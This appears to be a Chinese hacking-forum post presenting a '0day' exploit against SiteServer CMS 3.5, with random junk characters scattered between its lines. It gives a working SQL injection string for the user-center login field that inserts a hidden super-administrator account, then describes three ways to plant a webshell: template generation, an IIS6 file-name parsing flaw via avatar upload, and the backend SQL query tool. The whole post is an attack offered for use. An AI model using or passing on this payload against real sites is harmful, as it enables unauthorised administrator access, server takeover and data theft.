SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
" W8 D  P' V% [& q8 X0 L& |0 j
stieserver官网:www.siteserver.cn
# y3 s/ ?( {+ _) {
' n  S; ^  V0 Z! W3 h7 X
/ j$ J  [4 S9 D/ X$ L  c" S
EXP:

6 I. U' F, A6 W' ]6 H* s/ W直接访问UserCenter/login.aspx
# [8 n1 n* z. w+ ^  d
; {6 t3 S& `( I; W

" Y2 |5 K  G. A  Z7 m4 g: a用户名处输入：

123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
  n9 Z4 U; B& p
; W1 m8 p5 z, T/ A

密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。

+ k2 n% N6 j6 ?- q, d: q+ I

- M/ E7 w' i, g8 E之后再访问后台SiteServer/login.aspx用插入的用户登陆
; A$ o0 Y; P% o3 G6 f


3 I2 y: R0 P1 G6 j后台拿webshell的三种方法：
& B5 H5 A7 K; N1 T* Y5 y4 i9 _
一、

, v8 ]# T. t2 v# H+ x站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、

成员权限-》添加用户-》用户名为：1.asp
/ ?: F. a" D4 k( Z+ l! }; z
8 J  H% r+ h4 x8 l: T0 qhttp://127.0.0.1/usercenter/
/ G# ^% S% p- M9 t: L% _
# D, B1 Z! p0 S1 o3 i3 B! m+ q用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

（ps：后台添加用户时不会验证是否含有非法字符）
8 [7 u; ~% l" b% @/ h
三、
4 ~/ G7 Y+ @4 l" ~/ p' \7 F1 j
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
8 m1 }  \  s* E4 P+ M
" _5 g0 Y4 g0 U* a& U/ c系统工具-》数据库工具-》SQL语句查询
2 _5 r9 q5 L; `' t这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
& ^* c% R! ~/ L. m, b6 B4 c
2 E# n0 O$ C% z* b